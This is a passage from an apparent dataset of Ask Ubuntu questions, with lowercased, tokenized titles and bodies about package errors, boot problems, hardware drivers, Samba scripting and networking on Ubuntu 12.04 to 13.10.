unmet dependencies : evince : depends : evince-common ( < 3.7 ) but 3.8.2-0ubuntu4~raring1 is to be installed e : unable to correct problems , you have held broken packages . i 've tried apt-get clean , apt-get update , apt-get autoremove also ... i 've also followed the steps given here gnome 3.8 affects unity in ubuntu 13.04 , but i still have the same problem . any idea on how can i get everything working again ?
380923	how do i run ubuntu ?	i have downloaded a file called ubuntu-12.04.3-destop-amd64 iso image file to my downloads folder . when i try to run the file , windows starts to configure sonic recordnow ! ( why ? ) but then reports : the feature you are trying to use is on a network resource that is unavailable . click ok to try again , or enter an alternate path to a folder containing the installation package 'rnenu.msi ' in the box below . where `` the box below '' contains the string c : \hp\tmp\src\ i 've used windows explorer to look for rnenu.msi but it could n't find it in my computer . any advice would be greatly appreciated ... i 'm sick to my back teeth of windows .
380924	asus eee pc 1000ha/h camera not being detected	hello i am new to ubuntu i have an old asus eee 1000ha/h on ubuntu 13.10 x32 with windows 7 dual boot i could not get the camera running in any os i have it enabled in the bios my /sys/devices/platform/eeepc/camera is set to 1 in the file yet my pc can not detect my camera i have done almost every thing i can find on the net still no results . i even took a flash light to see if i had a camera in my screen lmfao . i will post my system information for you . i do n't think we can get this camera to ever work . info http : //pastebin.com/usvrxcti is there a way to fix this ?
380926	black screen after login in ubuntu 13.10	i upgraded from 13.04 to 13.10 few days ago . everything is working fine with my laptop , except a black screen appears after the login screen . it also gives message `` system error ! '' multiple times . i am using dell inspiron n-4010 with 4 gb ram graphics : intel ironlake mobile ( standard ) ubuntu 13.10 ( 64 bit ) i also tried to upgrade the drivers , but there is nothing about ironlake on the intel website . please help me on this .
380928	what do i need to unzip after downloading ubuntu-13.10-amd64.iso	dumb question but i dont know what i need to do next after downloading ubuntu-13.10 ? i 've read i need to burn it to a cd but the all the files in the folder are zipped . do i need to extract them all on my pc ( windows 7 ) and then burn them all or just the os ( i gues the big files ) thanks much .
380932	dynamic samba share mount script	first and foremost , thank you for your guidance in advance ! i am trying to dyamically mount nas shares ( and exclude others ) via a bash script . i would like to browse an open nas share : # smbclient -l 192.168.1.25 -n domain= [ workgroup ] os= [ unix ] server= [ samba 3.0.24-1.22_osstech ] sharename type comment -- -- -- -- - -- -- -- -- -- - info disk linkstation utilities share disk linkstation folder manager disk managers private folder ipc $ ipc ipc service ( `` eucalyptus_share '' ) domain= [ workgroup ] os= [ unix ] server= [ samba 3.0.24-1.22_osstech ] server comment -- -- -- -- - -- -- -- - eucalyptus eucalyptus_share workgroup master -- -- -- -- - -- -- -- - dddddomm dd-d-21075 workgroup eucalyptus then grep through the list to remove non-samba-share information and pre-installed information like an `` info '' share . share manager basically , out of all of the text returned , i only want to keep the active shares that i know have data in them . so in this case : share & manager , but for the purpose of expansion , i 'd like to code it inversely . i.e . instead searching for share & manager , i want to and identify and exclude everything else , leaving just share & manager . that way , if i later add scans , share , manager & scans will now automatically update.. in combination , i currently have a working backup script that executes based on the share name i pass through to it . i 'd very much like to create a loop that goes out , grabs the share names , and passes them to the backup script in this format : ./backup.sh share1 share2 ./backup.sh manager share what would be the best method to grab the existing shares , filter out details i do not want ( grep ? or -- exclude ? ) then have it laid out nicely to echo the share names in a `` one-liner '' how can i do this ?
380939	disagreement between `` about this computer '' and /etc/lsb-release	i have a dell xps that had ubuntu 12.4 factory installed , which i upgraded 12.4- > 12.10- > 13.4- > 13.10 using the software updater . when i look at /etc/lsb-release , i see what i expect : % cat /etc/lsb-release distrib_id=ubuntu distrib_release=13.10 distrib_codename=saucy distrib_description= '' ubuntu 13.10 '' however , when i go to the little gear icon in the upper-right corner of my screen and choose `` about this computer '' , it says in large letters that i am running ubuntu 12.04 lts . what is behind these two sources ? is something likely out of sync ?
380941	computer is stuck : the system is running in low graphics mode	i hope you could help.. my wife was trying to install brushes on gimp so she had to access the system files . she was trying to unlock root . the first command she ( read in ask ubuntu that had to be entered ) in was : press alt+f2 type in the command gksu nautilus and press enter howevere the root kept on staying locked . so the next one she tried was sudo passwd- this is where the hard disc started getting filled up by its 45g space . afterwards whatever she was trying to do it just kept on doing the same thing , saying that there is a an error in copying a file that i ca n't remember the name of . so basicly now when we switch it on -this is what comes on the screen : 1 : ! mark the system is running in low-graphics mode your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . we tried to free some space and fix the sudo . a message for missing plug-ins came out and nothing happened from there on . how we can resolve this ?
380947	ps3 bluetooth remote connected as linux input device has only one event type on 13.10	i 'm trying to setup my harmony smart control as a ps3 bluetooth remote control ( it pretends to be this remote ) under ubuntu 13.10 ( latest kernel and updates installed ) . my bluetooth dongle would n't work out of the box , so i had to do the following : modprobe btusb echo `` 050d 065a '' > > /sys/bus/usb/drivers/btusb/new_id after that i can pair the remote fine using bluetooth manager from the gui . it 's registered looking like a normal ps3 remote , according to bt-device : root @ server : /dev/input # bt-device -i `` bd remote contol '' [ 00:04:20 : e8 : b4 : b4 ] name : bd remote contol alias : bd remote contol [ rw ] address : 00:04:20 : e8 : b4 : b4 icon : undefined class : 0x250c paired : 1 trusted : 1 [ rw ] blocked : 0 [ rw ] connected : 1 uuids : [ humaninterfacedevice , pnpinformation , 00001800-0000-1000-8000-00805f9b34fb ] i can see packages coming from bluetooth for every key press like this : root @ server : /dev/input # hcidump -x -i hci0 hci sniffer - bluetooth packet analyzer ver 2.5 device : hci0 snap_len : 1500 filter : 0xffffffffffffffff > acl data : handle 11 flags 0x02 dlen 17 l2cap ( d ) : cid 0x0041 len 13 [ psm 0 ] a1 01 00 00 00 00 ff ff ff ff ff 01 05 > acl data : handle 11 flags 0x02 dlen 17 l2cap ( d ) : cid 0x0041 len 13 [ psm 0 ] a1 01 00 00 00 ff ff ff ff ff ff 00 05 so the pairing is definitely ok and key presses are received . the device is recognised as an input device per syslog : bluetooth : hidp ( human interface emulation ) ver 1.2 bluetooth : hidp socket layer initialized input : bluetooth hid boot protocol device as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.0/bluetooth/hci0/hci0:11/input14 but when i do a evtest on the device , i only get this : root @ server : /dev/input # evtest /dev/input/event6 input driver version is 1.0.1 input device id : bus 0x5 vendor 0x46d product 0xc129 version 0x0 input device name : `` bluetooth hid boot protocol device '' supported events : event type 0 ( ev_syn ) properties : testing ... ( interrupt to exit ) it looks to me like there is only one event type for this remote and no key press triggers it . additional output from lsusb for my dongle below [ 1 ] . my questions : is btusb the right kernel module to use ? why do i have to use the echo command for my dongle to be recognised by the module ? is there an additional configuration i need for the input layer to recognise the additional event types ? [ 1 ] lsusb output for bluetooth dongle : http : //pastebin.com/xhm5yzxb
380948	subversion thinks all files are empty	for some reason when i do a diff my subversion thinks that i have deleted every line in every file for the repo . if i do a diff with git it looks something like this : diff -- git a/venturebeat2-preprod/functions/class-vb-twitter.php b/venturebeat2- preprod/functions/class-vb-twitter.php index 08a7717..99b7998 100644 -- - a/venturebeat2-preprod/functions/class-vb-twitter.php +++ b/venturebeat2-preprod/functions/class-vb-twitter.php @ @ -22,6 +22,7 @ @ class vb_twitter { var $ meta_key_status = 'vb_tweet_status ' ; var $ meta_key_skip = 'vb_tweet_skip ' ; var $ meta_key_manual_skip = 'vb_tweet_manual_skip ' ; + var $ meta_key_featured_image = 'vb_tweet_featured_image ' ; var $ meta_key_date = 'vb_tweet_date_ ' ; /* @ @ -220,10 +221,15 @ @ class vb_twitter { if ( $ post- > post_type ! = 'post ' ) return ; $ manual_skip = get_post_meta ( $ post- > id , $ this- > meta_key_manual_skip , true ) ; + $ featured_image = get_post_meta ( $ post- > id , $ this- > meta_key_featured_image , true ) ; if i do a diff on the exact same repo with svn i get this : index : class-vb-twitter.php =================================================================== -- - class-vb-twitter.php ( revision 126419 ) +++ class-vb-twitter.php ( working copy ) @ @ -1,563 +0,0 @ @ - < ? php -/** - ** twitter api functionality using codebird - **/ -class vb_twitter { - - /* - * class variables - */ - - var $ options_name = 'vb_twitter ' ; - - var $ consumer_key = null ; - var $ consumer_secret = null ; - var $ venturebeat = null ; - var $ gamesbeat = null ; - var $ token_set = false ; - - var $ meta_key_too_long = 'vb_tweet_to which that continues until the bottom of the file . when i do the same diff command on a mac on the exact same file the diff looks like the git diff . i thought maybe the svn version i had was broken so i updated my svn from 1.7.9 to 1.8.4 and the exact same thing happens . i tried using svn-workbench and the svn extension for eclipse both of which will produce good diff files , but when exported to a file produce the same result as if i used the command line .
380954	no ati hdmi audio . ubuntu 13.10 . a10-6500k	i have tried so many things and ca n't get this to work . i am using the amd a10-6500k on a asrock fm2a88x-itx+ motherboard . i have installed multiple versions of the amd catalyst propietary driver and no matter what i do i can not get ubuntu to recognize my sound device . here is some relevant info . aplay -l **** list of playback hardware devices **** card 0 : generic [ hd-audio generic ] , device 0 : alc1150 analog [ alc1150 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : generic [ hd-audio generic ] , device 1 : alc1150 digital [ alc1150 digital ] subdevices : 0/1 subdevice # 0 : subdevice # 0 lsmod | grep '^snd' snd_hda_codec_realtek 56599 1 snd_hda_intel 48210 5 snd_hda_codec 188852 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 102033 3 snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30095 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq snd 69141 19 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi lspci -vk | egrep -ia13 `` audio '' 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) subsystem : asrock incorporation device 1150 flags : bus master , slow devsel , latency 32 , irq 16 memory at ff740000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 kernel driver in use : snd_hda_intel 00:14.3 isa bridge : advanced micro devices , inc. [ amd ] fch lpc bridge ( rev 11 ) subsystem : asrock incorporation device 780e flags : bus master , 66mhz , medium devsel , latency 0 00:14.4 pci bridge : advanced micro devices , inc. [ amd ] fch pci bridge ( rev 40 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , 66mhz , medium devsel , latency 64 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=64 any help would be greatly appreciated . if you need any more info please let me know . thank you .
380958	wget with response time	i 'm trying to debug some network issues and i 'd like to track down the response time for different events . for instance , the time it takes to connect to the server vs the time it took for the server to render the page ( so time wget ... wo n't work ) i 've been using wget $ wget -- spider www.google.com spider mode enabled . check if remote file exists . -- 2013-11-22 13:56:10 -- http : //www.google.com/ resolving www.google.com ... 74.125.224.52 , 74.125.224.49 , 74.125.224.48 , ... connecting to www.google.com|74.125.224.52|:80 ... connected . < -- time here http request sent , awaiting response ... 200 ok < -- time here length : unspecified [ text/html ] remote file exists and could contain further links , but recursion is disabled -- not retrieving . is there a way to add time stamps to the various requests ?
380959	serious lagging in ubuntu 13.10	i recently installed ubuntu 13.10 and after a few weeks of running found that if i had it on for a few hours all of my programs would start lagging particularly when i tried to interact with anything ( long processes like copying 200gb directories worked at normal speed ) . i found this strange and so i started looking at htop as this happened and found that a single core would often shoot up to 80-90 % while the others were around 30 % and then drop down . this is reproduced after waiting a while and then trying to click on anything or try to switch desktops using the compiz cube functionality or press super to access the dash in unity . i found this bug as a possible parallel to my problems , but i added the proposed repository and then ran both update and upgrade and i was still experiencing problems . is there other bugs or known problems that would cause this type of behaviour ? i 'm not particularly well versed in bug diagnosing with new distros . so if there 's a better place to post this or some kind of diagnostic software i should run , please say so .
380961	optimal ways of installing and maintaining ubuntu installations while off line ( starting with dvds ) ?	i got my installations from raring ringtail which offers xubuntu , l , k , gnome and unity . let me also state that i know these version are already probably dated , since open source is always moving . i would like to create a single installation , say xubuntu , which i can do easily ( have done so on dual boot and vitualbox on windows 7 ) and get it up to date with 13.1 and 3rd party additions ( at this point i will be in pub with internet ; ) . since i do not want to be too drunk after the base install , i will like to continue building out my installation back home on my sv . my real challenge and real question to you is how to install from dvds the additional software i already have available on these two dvds , such as additional windows managers and the likes ? i do n't want the latest ( i can install updates from internet when i am connected again ) , i only want the exact versions on these dvds to get me started with my image . having an xubuntu base install , adding then unity & lubuntu ( maybe others ) from the dvd ... then look for other software that i wish to play with or substitute for those installed with these particular flavors . so it would be good to not only be able to install , but easily examine what packages i would have available from the dvds in hand ? so , for those still patient with me , to sum up : 1 . ) after base install be able to point my package manager to look at and tell me what packages i have available on my 2 dvds ? 2 . ) to install different flavors of ubuntu windows managers , such as unity , lubuntu , kubuntu , etc. ? 3 . ) install other desired applications ( xbmc , file manages , utilities , etc . ) that are not packages with the above selected ubuntu flavors ? thanks in advance to your understanding , patience and interest in helping out those trying to improve their knowledge and abilities with ubuntu : ) cheers !
380964	adobe reader tabs illegible : grey on grey	i 'm using adobe reader 9.5.5 ( the default version to my knowledge ) on 12.04.3 , and the inactive tabs are a nearly-illegible grey on an ever-so-slightly darker grey gradient : how can i improve the contrast ?
380966	changed suoders to an account that does n't exist , what should i do	i 've installed ubuntu 12.04 with single user , let 's call him user1 . i then created a new user , let 's call him user2 . i wanted user2 to be the only user with sudo rights , so i removed all users from the sudoers file , and wanted to add user2 only ( and root of course ) , but i entred the name incorrectly , let 's say i gave user3 the sudo rights ( a user that does n't exist ) . so now the only users in the system are user1 and user2 , they do n't have sudo rights , and i did n't enable the root account , is there anything i can do ?
380967	open source stun turn server which can do hole punch is there similar packages ?	is there any open source stun/turn server which can do hole punch like numb for ubuntu ? numb is a stun/turn server . description a stun/turn server is used for nat traversal in voip . whether you're at home behind a common router , at work behind an enterprise firewall , or traveling , chances are that you will be behind a nat which must be traversed before making calls . our server , numb , will help your sip phone automatically punch holes in the nat . as a solution of last resort , it will simply act as a relay between you and the person you 're talking to when end-to-end connectivity just is n't possible .
380970	epson scanner sx218 - works intermittently	my epson sx218 does not seem to be reliably recognised . i have installed the correct drivers from the epson website . i have edited the /etc/sane.d/dll.conf file to contain the uncommented line - epkowa . i have edited /lib/udev/rules.d/40-libsane.rules in accordance with the instructions at https : //help.ubuntu.com/community/settingscannerpermissions . i have ensured that the 2 users on the system are members of the scanner and saned groups . when i click on the iscan icon on the launcher , the icon fades and brightens unless i double click and then i get a dialogue box up that says epson ( unknown model ) [ epkowa : usb:003:006 ] . i then get a dialogue that says could not send command to scanner - check scanner status . sometimes though the dialogue recognises the scanner as epson stylus nx220/sx218/tx220/me - when i click `` ok '' then iscan starts up and the scanner works perfectly . sane-find-scanner does not find the scanner either as a user or as sudo . what is going wrong ?
380971	how to access files from a cluster behind a firewall	i use my university cluster for computing . recently i have installed vpn for remotely accessing the cluster through university network and logging into firewall and then onto cluster . i want to copy files from a folder to my local deskstop . how do i do that ? normal scp cmd doesnt seem to work . thanks .
380973	invalid argument argument when moving files	i am trying to move all files in the current directory to the directory guarddog-cms . now all the files are actually identical , but the files in the current directory are more up-to-date . so when i do the move , i also want to make sure it does n't prompted me with `` file already exists '' or anything like that . so i try the following : ~/documents/github/guarddog-cms-temp/guarddog //current directory ~/documents/github/guarddog-cms //destination directory mv -v . ../../guarddog-cms but it gives me this error : mv : rename . to ../../guarddog-cms/ . : invalid argument
380974	how to write a 'hotcorners ' script in python ?	i 'm using lubuntu 13.04 , and a feature that i miss from compiz is the hot-corners : it simply runs some command when the mouse cursor reaches a corner of the screen . so , i was thinking about writing a script to handle that for me . but some questions arose : how do i get the current mouse position ? i looked for this , found some enviroment variables , but none of them is about the cursor position . i 've seen many bash scripts , but could i write one in python ?
380975	ca n't boot , there 's a grub error and boot-repair fails	i have had a problem trying to restore a dual-boot windows 7 / ubuntu 30.04 installation . the computer had windows 7 installed for about a year . three days ago i installed the secure-remix of ubuntu 13.04 ( successfully ) . yesterday when i rebooted ( no significant changes that i know of ) grub said it could n't access normal.mod ( as in : file error /boot/grub/i386-pc/normal.mod trying to repair boot , live dvd install probleml ) i booted from a live cd and attempted to use boot-repair . it fails with the error `` please enable a repository containing the [ linux ] packages in the software sources of linux-secure-remix-64bit 20may2013 ( sda5 ) . then try again . '' ( record here ) . i tried to add all the repository sources but boot-repair still seems to fail . i would like to know , is it just that it ca n't access a required repository or is something else wrong ? do i need to reinstall ubuntu ? i think that the secure remix includes clean-ubiquity which backs up my mbr , but not sure what i can do with that .
380976	can not find a way to install php 's pecl bbcode exentsion	is there an easy way to install php 's pecl bbcode extension on ubuntu ? when using it on lamp ?
380980	ubuntu 12.04 window management bug with grid/put and multiple displays	in ubuntu compizconfig settings manager , there are two very useful window management plugins . `` grid '' does essentially the same thing ( and then some ) that windows aero `` snap '' does . via mouse actions and keyboard shortcuts you can snap the active window to various preset locations ( left half of screen , upper right quarant , etc ) . however , these keyboard shortcuts only work on the active display ( i.e . you ca n't move the window out of the current display using any of these ) . `` put '' allows you to use a keyboard shortcut to move the active window from the current display to another one . it works great , unless you 've previously used the grid plugin to snap the window into place . in this case , the window will move to the new display as desired , but then about 1 second later it will bounce back . to be clear : the window will only move across screens via the `` put '' keyboard shortcut , if that window was not previously snapped to a preset `` grid '' location . has anybody else experienced this ? any ideas for a solution ?
380981	`apt-get upgrade` stalls with zombie `dpkg` - what to do ?	during an apt-get upgrade on a server , output stalled and in investigation i found a zombie dpkg process , but the apt-get process still alive . what is the best way to handle this ? the dpkg log shows the last operation apparently completed successfully ( `` status installed ... ) . a potential cause is that the ssh session in which i did apt-get upgrade is from a ( local ) terminal running in byobu and at the same time there is a lot of network traffic from my local machine to the server . edit : perhaps a more likely cause is a sluggish virtual hard disk ( the server is a cloud instance ) ..
380988	change of ownership causes nautilus to crash how can i change it back ?	installing solr i change the ownership of a folder called solr ... usr/share/solr-4.5.1/example/solr/ to tomcat7 but now when i try to change it back nautilus keeps switching off i have changed the owner back to ed , but it still is doing it in nautilus . the original owner was me to start with : what have i done , why does nautilus keep crashing when i look at the permissions on this folder and how can i fix it ?
380990	configuring containers to use veth # , bridges and vlans on the server ( only ) ?	i have two groups of lxc contianers on a server and want to isolate their network traffic for security reasons . i will be using port forwarding so the containers much each have separate ip 's . i know i must subnet both groups and intend to give each a /29 cidr . i also assume i need to put each on it 's own vlan . however i 'm not sure how the veth # , bridge , vlan and host nic need to be arranged and what options there are if any ? ideally i would like to confine the vlans to the server alone , so that the host nic receives the forwarded packets from the router/firewall untagged . they then get tagged and untagged as they pass from the host nic through any bridges and vlans to the veth # s on the containers . in short i just want to isolate the traffic from the point it leaves the container 's veth # to the point it leaves the host 's nic ? so if there is a simpler way i 'll be glade to hear it . p.s i am using ubuntu server 12.04 with it 's lxc network libraries . i have not installed libvirt separately . any information or suggestions greatly appreciated . charlie101
380992	how to exit grub and continue/proceed to log in screen ?	everyone , i 'm stuck at this screen : gnu grub version 2.00-19ubuntu2.1 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > i do n't know what to do . i do n't know what to type . i saw the commands and none of them i ... i do n't have any idea . the only way i know is the ctrl+alt+delete and the might power button . p.s . if the cause of this thing is because the system was not properly shutdowned . directly from the power source . i 'm sorry , saucy salamander . edit 1 i tried some test , from my readings here in the forum : ctrl + x < == does n't work insmod hd0 error : file /boot/grub/i386-pc/hd0.mod not found available commands : [ authenticate badram boot break clear configfile continue cutmen echo export extract_entries_configfile extract_entries_source gettext initrd insmod linux loopback ls menuentry normal normal_exit probe return sear search.file search.fs_label sear.fs_uuid set setparams shift source submenu terminal_input terminal_output test unset ] edit 2 if this will help solve the issue . while i 'm here in windows , i browsed the ubuntu installation folder , ubuntu > disks > and the 'root.disk ' file which is like 16gb is nowhere to be found . and i have this application daemon tool that can mount disks/iso and the root is there . just hoping . edit 3 i hope this can be fixed . or else i have to reinstall ubuntu again . back to square one .
380993	nitrogen dual display settings reset after period of time ?	i 'm running ubuntu 13.10 and am having some issues with nitrogen . naturally , it resets when restarting the machine but i 've changed my profile settings to restore once the terminal is open ( so that 's not a big deal ) . recently though , it 's started to reset after a period of a few minutes even when the terminal is open . anybody have some insight into this issue ? also , i 'm running cinnamon .
380995	`` kernel requires x86-64 cpu , but only detects i686 '' in an intel intel core i7-2600k ?	i have a vm installed in my windows 7 pc , and i want to install an ubuntu 13.04 on it , as a new virtual disk . i have this machine : intel core i7-2600k cpu @ 3.40ghz - 8 gb ram - 64 bit operating system i get this message : kernel requires x86-64 cpu , but only detects i686 why is this ? i think iâ´m missing something really silly here ...
380998	unable to boot 12.04 after install on 3tb drive	brand new system ( custom built w/i5 core and asus z87-plus motherboard , 16gb ram ) and drive . installed 12.04 64 bit via usb onto 3tb sata drive . upon completion , reboot and it drops into bios . if i install same on an older 1tb drive , it works fine . checking the two disks , the 3tb has a 1mb partition at the start , type unknown , whereas the 1tb has the boot partition . booted from the 1tb and ran disk repair on the 3tb drive . complete successfully , but trying it by itself , it does not boot ( and gparted shows the same 1mb partition ) . here is the report : http : //paste.ubuntu.com/6461458/ any idea as to why ubuntu is not installing correctly not this disk ? any suggestions to resolve ? if there is another post on this , please let me know - i searched and could not find something similar . thanks ! update : after install , ubuntu does not boot , but moving drive to another system works . if i install windows 8 on the 3tb drive , it boots fine . if i then try to install ubuntu 12.04 for dual boot , it does not see the windows os . any ideas ?
381001	change keyboard layout when running from usb	i run ubuntu 12.04 temporarily from usb made with unetbootin ( because not allowed to install to this machine ) . machine has finnish keyboard . how do i get the right keyboard layout . ( system settings has only us keyboard available . )
381003	firefox full-screen flash not working	in ubuntu gnome 13.10 , attempting to view flash video full-screen does nothing but freeze the video . the freezing can be fixed by unfocusing and refocusing the window , but i can not get flash to go full-screen . however , when i view a ( non-embedded ) youtube video , full-screen works fine . could anyone tell me how i can fix this ? it seems strange that youtube seems to ( almost ) work but nothing else . in case you need them , here are my detailed system specs : description : desktop computer product : ideacentre k430 ( ) vendor : lenovo version : lenovo product serial : es09865757 width : 64 bits capabilities : smbios-2.7 dmi-2.7 vsyscall32 configuration : administrator_password=disabled chassis=desktop keyboard_password=enabled power-on_password=disabled uuid=c841a482-9ba0-e111-8f3c-043c2c3f2200 *-core description : motherboard vendor : lenovo physical id : 0 serial : es09865757 *-firmware description : bios vendor : lenovo physical id : 0 version : e8kt24aus date : 02/16/2012 size : 64kib capacity : 2496kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb biosbootspecification uefi *-cache:0 description : l2 cache physical id : c size : 1mib capacity : 1mib capabilities : internal varies unified *-cache:1 description : l1 cache physical id : d size : 256kib capacity : 256kib capabilities : internal varies *-cache:2 description : l3 cache physical id : e size : 6mib capacity : 6mib capabilities : internal varies unified *-memory description : system memory physical id : f slot : system board or motherboard size : 16gib *-bank:0 description : dimm ddr3 synchronous 1600 mhz ( 0.6 ns ) product : 16ktf51264az-1g6m1 vendor : micron physical id : 0 serial : 3a8979ca slot : channela-dimm0 size : 4gib width : 64 bits clock : 1600mhz ( 0.6ns ) *-bank:1 description : dimm ddr3 synchronous 1600 mhz ( 0.6 ns ) product : 16ktf51264az-1g6m1 vendor : micron physical id : 1 serial : 3a8979e1 slot : channela-dimm1 size : 4gib width : 64 bits clock : 1600mhz ( 0.6ns ) *-bank:2 description : dimm ddr3 synchronous 1600 mhz ( 0.6 ns ) product : 16ktf51264az-1g6m1 vendor : micron physical id : 2 serial : 3a8979dd slot : channelb-dimm0 size : 4gib width : 64 bits clock : 1600mhz ( 0.6ns ) *-bank:3 description : dimm ddr3 synchronous 1600 mhz ( 0.6 ns ) product : 16ktf51264az-1g6m1 vendor : micron physical id : 3 serial : 3a8979f8 slot : channelb-dimm1 size : 4gib width : 64 bits clock : 1600mhz ( 0.6ns ) *-cpu description : cpu product : intel ( r ) core ( tm ) i5-2320 cpu @ 3.00ghz vendor : intel corp. physical id : 10 bus info : cpu @ 0 version : intel ( r ) core ( tm ) i5-2320 cpu @ 3.00ghz slot : socket 0 size : 1600mhz capacity : 1600mhz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 popcnt tsc_deadline_timer aes xsave avx lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid cpufreq configuration : cores=4 enabledcores=4 threads=4 *-pci description : host bridge product : 2nd generation core processor family dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : xeon e3-1200/2nd generation core processor family pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 09 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : e000 ( size=4096 ) memory : f6000000-f70fffff ioport : e8000000 ( size=167772160 ) *-display description : vga compatible controller product : gf119 [ geforce gt 620 oem ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f6000000-f6ffffff memory : e8000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-multimedia description : audio device product : gf119 hdmi audio controller vendor : nvidia corporation physical id : 0.1 bus info : pci @ 0000:01:00.1 version : a1 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:17 memory : f7080000-f7083fff *-usb:0 description : usb controller product : 7 series/c210 series chipset family usb xhci host controller vendor : intel corporation physical id : 14 bus info : pci @ 0000:00:14.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:41 memory : f7100000-f710ffff *-communication description : communication controller product : 7 series/c210 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei_me latency=0 resources : irq:44 memory : f711a000-f711a00f *-usb:1 description : usb controller product : 7 series/c210 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:16 memory : f7118000-f71183ff *-multimedia description : audio device product : 7 series/c210 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:45 memory : f7110000-f7113fff *-pci:1 description : pci bridge product : 7 series/c210 series chipset family pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport:2000 ( size=4096 ) memory : e0100000-e02fffff ioport : e0300000 ( size=2097152 ) *-pci:2 description : pci bridge product : 7 series/c210 series chipset family pci express root port 6 vendor : intel corporation physical id : 1c.5 bus info : pci @ 0000:00:1c.5 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 ioport : d000 ( size=4096 ) ioport : f2100000 ( size=1048576 ) *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 06 serial : 8c:89 : a5 : d2 : af:86 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=10.0.0.9 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport : d000 ( size=256 ) memory : f2104000-f2104fff memory : f2100000-f2103fff *-usb:2 description : usb controller product : 7 series/c210 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:23 memory : f7117000-f71173ff *-isa description : isa bridge product : z75 express chipset lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 04 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-storage description : sata controller product : 7 series/c210 series chipset family 6-port sata controller [ ahci mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 04 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:42 ioport : f070 ( size=8 ) ioport : f060 ( size=4 ) ioport : f050 ( size=8 ) ioport : f040 ( size=4 ) ioport : f020 ( size=32 ) memory : f7116000-f71167ff *-serial unclaimed description : smbus product : 